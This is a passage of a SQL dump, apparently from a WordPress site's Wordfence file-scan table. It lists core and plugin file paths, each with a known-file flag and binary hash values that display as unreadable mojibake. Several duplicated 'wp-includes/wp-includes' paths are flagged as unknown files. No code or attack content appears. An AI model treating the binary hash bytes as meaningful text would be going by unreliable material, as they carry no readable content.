Y����ǥ','wp-content/plugins/wp-smushit/core/external/free-dashboard/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ֆxA�.��zJO\n�','\Z��c�9���:���A2dC�Z�|���(��','',0,'?'),('\'�g|͹\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�!ղ�{/�','{`{WaׅvF�0�j�s���l�J2����','',0,'?'),('\'�I��՘��qpE','wp-content/plugins/wordpress-seo/inc/class-addon-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�7��A�}E�,R\r_','��qi��5��������tSgK�/d�O�	','',0,'?'),('\'�qWE&/�yU��','wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d⑴�5��kY?��>','�K�Qc���-b\Z���t���Nfl��_���','',0,'?'),('\'ڨ�oκdm=�ù�9','wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',0,'L�{��p�׶�Ҡ','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qxM!��\nB��+=L�',';�Oҥv���̉�����	����\n����','',0,'?'),('\'�0�o�Lx�����','wp-includes/wp-includes/js/dist/block-directory.min.js',0,'�*U���ܰ��(���','�*U���ܰ��(���','��5�~�Y*�2M���3zf�f%���w�L�qՇ�','',0,'?'),('\'�E��w�D9�>��8','wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php',0,'(��|v�}�9S�9S','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('\'��+d��)UM�_��','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Output/QRCodeOutputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gI,��9�N���2�','8�-�.��P�?|$��1�t\nq�}D�CWA�=��','',0,'?'),('\'��̬L�Nќ��I�R','wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',0,'�!�<�]��r�','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('\'鰜�:�f_���\"r�','wp-content/plugins/wp-smushit/app/views/bulk/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b[%�\Zt�N�.ݣ�C','�c�G����A:���Qh%��gM�*��_�]�','',0,'?'),('\'�,���ۥNiƣN','wp-content/plugins/wp-cerber/assets/flags/re.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~8�x@�{�q��k','b�g����z�V�5�A��t���w���ۨvI','',0,'?'),('\'�p�jA�y�(��ވJy','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�b��ABx�ue!V���','�Ѱ��F�m9��P��Z�pD���jr�2�x	6�','',0,'?'),('(I�A�w�ί�;��','wp-content/plugins/wp-cerber/assets/flags/sz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qh<�F��kU�{�K��','\"(N�X�p��c�1�t�T�8�7���C^iJg�','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('()���A��G���T�w','wp-content/plugins/redirection/redirection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��-\\��E �','�Yɐ.��kSrh�d���@��\r\"7�~��','',0,'?'),('(0�0k9Y����A��\Z','wp-includes/blocks/preformatted/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E9,��G�r�p�i�_','cSnmqr�:�hNe�W��{(w�D�~n\'�+�','',0,'?'),('(1��Ct�wt�2�?~','wp-content/plugins/wordpress-seo/js/dist/languages/cs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�~�̄,�a��[qF','E�(c�Ҫ|���\nv���E����1Λ��','',0,'?'),('(2��A$��Sa���ɺ','wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-login-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p���敻�1��y�','#�\n|�4Ꞃ#Mp��5��^��Hj��5w�}','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(Ll�C��`� a&�','wp-content/plugins/wp-fastest-cache/templates/download.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i���A(��{n�c','\n�S}q@����4\nB����F9�,a\\�','',0,'?'),('(Tm$�4�\Z�O��A�','wp-content/plugins/insert-headers-and-footers/ihaf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4I����o�Q�&��˙.','�qK;	6��;��AE2��)���G��','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�#X�T��pPŊ:M','���`�a=�|�;�^ky��	8u��G��6��','',0,'?'),('(W��0����a�(Ȥ9�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Coroutine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6:�C�S����','�m���q��Q�@\'��x���3x��}!\'��','',0,'?'),('(Y��7��\'u՜��-','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dimensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��`�d�','�Y�둻R�~�5�5X���p��\Zݩ�A��','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vԟ��A/5&G��>��','�8��e	�q]�5��\'�b�Y(	7&���N��','',0,'?'),('(h\"\n�-B���	Wd6','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js',0,',m;V*H��Tt���~X�',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('(jxF0/���ʏ�)��','wp-content/plugins/redirection/locale/json/redirection-en_AU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j� �j������\\�','aIv;2Rb�$�8��C�h��b��wv2X�l','',0,'?'),('(l��օ+%�m���GI@','wp-includes/blocks/rss/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','եB��vTE�|��(','UZ̫��X2��/�����x\"UU��KT�<.�','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:�	','',0,'?'),('(ylc��h���6KD','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-hustle.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��t�Nj����S�','��\'Y�4������~F�@X�n���V��>��','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0�D�ٖ(��:!','�\r�b���ߝT�.*��ύV��W�','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N6\'8;ڇ믍���V1�','�oYH4	lY�1�YG�H�tmS�Z/)�\"��','',0,'?'),('(��Q�NE���y:�B��','wp-admin/images/about-header-privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jz\"��q�����','�dX_˜�&�h���6_��?���q|��,}','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�T�k|�k�sT��','wp-includes/blocks/post-author/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǩ&h.2�0���#','|wahV=�ǣ\\�m��	M�����+T�\Z,�� �','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':H�El�D�\nχ�6','I|7�g�gWڣԭ;t~!���t��Ő#�Y��','',0,'?'),('(�\\�C�*o)���','wp-includes/wp-includes/js/dist/blocks.js',0,' */ĭ�b��@m�0',' */ĭ�b��@m�0','����˴kS򢱼h�4���!�3:�Tæ�~DM','',0,'?'),('(����\"����E=�','wp-includes/wp-includes/js/jquery/ui/button.min.js',0,'�k{�qz�uo�>���','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�fP]���<}\n�J�','a�Ԡ���P�p����)\n}{̌���)�F���','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(��� R�w���?}','wp-includes/wp-includes/class-wp-role.php',0,'��yH���,o�:���','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(����M�(�72���','wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js',0,'<�C�_hz�3��<7','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('(�p���	�����','wp-includes/wp-includes/css/dist/nux/style-rtl.min.css',0,'\n����n��L�6\r�k','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('(�1��� Θ:�','wp-content/plugins/redirection/models/permalinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�%�	1tN�\0Az�','��`�:�i�|��&#���P�ϸg�G��C','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Х�x�	^�5��','H�3����y��&�k��3����}���:','',0,'?'),('(��s�3TN�o(�','wp-admin/images/freedom-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�9f\r��OJ\Z��]�','��eM���O����8\0\\\0�����7��ˆ�','',0,'?'),('(�d���9n�+̦�','wp-includes/wp-includes/theme-compat/footer-embed.php',0,'��Z����.�+�j','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(�ZbcIJ��6p�\"$�','wp-content/plugins/wordpress-seo/src/helpers/options-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*+X(]�c\07f��','(�P�N�1H����5���{�^�B�;\nD','',0,'?'),('(�\"�>Z:q��&�','wp-content/plugins/wp-cerber/assets/flags/aw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�c/\nY�4�aV�A','tv-��-�Ȟ?P��^�,R�Y�𵨸9�Z�','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�ן�Ы��E*3��','���U�^����9p��&���`�nM{� n�L','',0,'?'),(')\'hL휞�\rЀ^����','wp-includes/blocks/page-list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%YR�\0�ac�!�=','�*�?u�SN��o���#�d+Ā���0','',0,'?'),(')FTj����CJc�G','wp-includes/blocks/image/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�G�h�=Q� ��/�','�58�!��2A�r�ff�X�xYm@x�΀Q?/�','',0,'?'),(')SB&�Fy�/N���]8\Z','wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php',0,'!�i��L�V=X+�	v0~','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),(')b���*nA��~�','wp-includes/wp-includes/js/plupload/wp-plupload.min.js',0,'����Z�:�x��r�','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zy�r��_5�KA�Uz�','����7��]���\r��,֐���w�����@ҡ','',0,'?'),(')���&�`��&�X	���','wp-includes/js/dist/preferences-persistence.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>��{�5���\n�','���D{�U�;q�;~|��N&a~��Z\0�\\�','',0,'?'),(')�3�\r��r-��ty','wp-includes/blocks/media-text/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��t5�KY3�ॳ�','�ۙ��Bt%�C�֎ώ�^\"D�%���O�2A','',0,'?'),(')���^�F����y?�2G','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/front-page-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�ۥWx\rǵ���','+1�\\�3�AW\\�Q��[f�\n_ZA���˪Hf�','',0,'?'),(')�7{\r);2i��+���','wp-includes/blocks/read-more/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���)MS{\"\\��\'','Y�\"���_�^&���G/\Z���2\0�j��@$�','',0,'?'),(')�*��S�k�QK2,','wp-includes/wp-includes/js/wp-sanitize.min.js',0,'i�f05��}$��]���','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),(')�7��{Ux�����r�O','wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���7�A�7�~C-��','.F5)�\rq��v�^�7d�|k�HLp���','',0,'?'),(')��H7�N�Jbv�/�','wp-includes/wp-includes/images/media/text.png',0,'z��s��0�ȝ�Q�K','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(')�;���tV���n�','wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-elementor-post-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�;ck��W87�:����','^F���q\\�\'�Zo�t��nU\0a�	��/��','',0,'?'),(')��3���C2��b�.','wp-includes/blocks/comments-pagination-numbers/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��켦�,��^�>@�','�8���-\\^^���}��*�w	�L�l��o %','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���j�1A.�+s7��','�_�k<��E;�۝��@�:�mI�iQ-΢8�h�$','',0,'?'),(')�i6`�D����<��,','wp-content/plugins/wp-cerber/assets/flags/pl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y.�,|��~>�>J��','iDU�z�\0U$A�N�\\�\Z%p/����F#�ߋ','',0,'?'),(')Ő�1�H$�`��','wp-includes/wp-includes/images/toggle-arrow.png',0,'��·�a��;�d��*�','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�g��s� ���`V�','��j(���ؠ\r	緪���U+���.�d','',0,'?'),(')�:MT�{j��0�','wp-content/plugins/wordpress-seo/src/conditionals/woocommerce-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�o�_��xz5I{','r�4S�E�`\r������0�@\\#��\rѝܓ�ED','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�e�V��bӻ5=��','F��n<�7[zO��N��\Z��pE3@r�B0','',0,'?'),(')警�Q��Q�/Y�9','wp-includes/blocks/page-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;r���眯w+','���p<��b�C�A�!$����9񐇗c�pL��','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��\0H��䮢\\\"��','��^ϳg$]����B�4n���\r\'z{h�zU','',0,'?'),(')�x���O�5��-','wp-includes/wp-includes/js/colorpicker.min.js',0,'��3+ h\"��C��k','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('*��g�������H','wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�p��A���l�2.�','ʥ\r���wׂ`�,s���ű��g��W�2*)','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3=�~Mx��4y�*','�e�����\"	F�`�)�pR����bjۉ�^�','',0,'?'),('*O�z��!�.��aav�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',0,'eo1Ǡ܇4RA����','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('*Tǚ�qG6��R��H�','wp-includes/blocks/site-logo/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���pI��w�YW@–/�','��*I�R�<������OYT>_4�:F8�D��','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_~���.��Fą���',':�*.�uF�٤2�o�3Z\'}K�CW�Q!�؛�','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͈ϚW:l���q~','�g��NQ	�������/���	�y5������θc','',0,'?'),('*��*�W8��5��2~','wp-includes/css/dist/reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ށgky�Ƚ�imV���','�F4�B@R��j�ו��N�΄�SH��7�','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*��T�d�p`)\nƿ','wp-content/plugins/wordpress-seo/src/services/health-check/runner-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P^���N�@�����','��>�/ɬRyZD����Iz?ꋧH�w\"��z�','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�-\nwAS\\�\0�A�\'','wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�o��F05X�? �g,','ˉ�9+k�z��_~j�+�n�:x���vFf��0�','',0,'?'),('*�E�Ǭ�qQM���','wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js',0,'�o�go����~i�I	�','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*�	�ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�u�\nL������E','L8M��0�=�Y�kb���|59�b+�z:4','',0,'?'),('*�B=�s��C�F�zh�r','wp-includes/wp-includes/js/mce-view.min.js',0,'����<��@^�P�\'','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('+�(-V&S_2X7f�','wp-includes/blocks/paragraph/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fٳ!�eFM�L�O','0�3TK�&��&��d2Ѐ���F��#v�{+','',0,'?'),('+,����\"�#}JYo','wp-content/plugins/wordpress-seo/src/conditionals/wincher-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߣ��zf��9h�~��','H���`�1L=?,Zf4���]�\rE�յ$��-)n','',0,'?'),('+PXoV�h�S�)\r�','wp-includes/wp-includes/css/wp-auth-check.css',0,'�%��L��ԥ|l\"��','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('+\Z#(���ƒ��v���','wp-includes/blocks/comment-template/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�Zi1u��AsK','�=���52I�������#��=h:3Ӫˆ','',0,'?'),('+a���c�*�6�Ǿ','wp-content/themes/twentytwentythree/patterns/hidden-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gmuҊ���\'�;�','h޴ޘ�	��4�m>�8w�s��7���H]�O�','',0,'?'),('+5���8�1��쾡��','wp-content/plugins/wp-smushit/app/modals/checking-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�K�~P�t�0��',')�����a��J��>��T\rkR�(��a�W�','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƚ��ㆆ,�O�l��','73��ǣ	^&✖B\"9\Z͇t>���VG�o�k','',0,'?'),('+=z�58���Q���','wp-content/themes/twentytwentythree/styles/sherbet.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K+��-��@P���|O','��\n55��8@��Kݘ�t�\'uR zxw��','',0,'?'),('+AK\0�X\"��$�n5�','wp-content/plugins/wordpress-seo/packages/js/images/Yoast_icon_kader.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B���ѕ�w� C','�\\���痎<\r遷���%_�8��[ެF�W�','',0,'?'),('+E.�X��{.�@g�@�','wp-content/plugins/redirection/locale/redirection-en_ZA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�>���6�)�Z1','C�g��k����Dx\'�\\�Y_�=��˚�H/�','',0,'?'),('+N�H��l}¸�t��+','wp-content/plugins/redirection/locale/redirection-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xuK�.YP�ö<l�','W	X�Ѭ[���J�������β�xVg��x���','',0,'?'),('+N�m\n�=��-\0`�y','wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js',0,'SE���x=d��~���eM','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('+O�T�û^R�A�l','wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ׁU\"}��\rv��0H','����>wp*5�.y@@�y�{�8zI/��','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0	','',0,'?'),('+xVk��eg��4%��','wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php',0,'��D�5��$ý\n	�\'q0','��D�5��$ý\n	�\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('+�����f`��|�.�','wp-includes/wp-includes/js/dist/url.js',0,'�7����nb�A�x��','�7����nb�A�x��','+׺\r��O��2UP^kD\0(���c��J�<','',0,'?'),('+�g\0�k\Z�O�C��Z','wp-includes/wp-includes/images/smilies/frownie.png',0,'Q���������','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('+�.��=ح��5q����','wp-content/plugins/wp-smushit/_src/js/frontend/lazy-load.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�گ\\�9����� ⧍','x�Q�o�hW�i�\0tc.(�,T���L��M��','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��6`��|��p��;��','\\&�gc�SJ�}�m�g��F\Z�������G��&','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~+�x����m+t','��叶�g��K����Q?g�C-eON��\r�!','',0,'?'),('+��Hj~�����','wp-includes/blocks/read-more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�>܂��_��K�','�=*��Z��(N\r�D?d��1(��1]','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+�b����I=qY��','wp-includes/blocks/freeform/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�[%0���G���','�\r.ZE��h����(:�0B���$u�F','',0,'?'),('+̷�Y���p��$$�,_','wp-content/plugins/redirection/redirection-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e`���vǩ���!','C0�j�z��L�;�1�Q���Y���b%ט8�1','',0,'?'),('+�v!s�/� x��*^','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؆�c�T��GǮua�K','��#������\ntaf��lU,�o�d��R�(*��','',0,'?'),('+ڂa�\r&:���u��}W','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('+��w��dmD���X�=','wp-content/plugins/redirection/locale/json/redirection-es_VE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cp飿֣����$H','��)FE�pQ-��6��})N�}��U�;','',0,'?'),('+ަkUX���E����h','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�5a^�/C|g|�x���','��gi��:�\"�(L���{�Gi]rTմ1q��','',0,'?'),('+�P���F�:b�0��','wp-content/plugins/wp-cerber/assets/flags/gg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b&w� �)sO�V~F','X�|�5��j����Y$����5i}�0�,op�','',0,'?'),('+�-�re�=XZr�yg','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�0�*���nB�l���','��jHF�00�w�J�q6X�[��	S�69 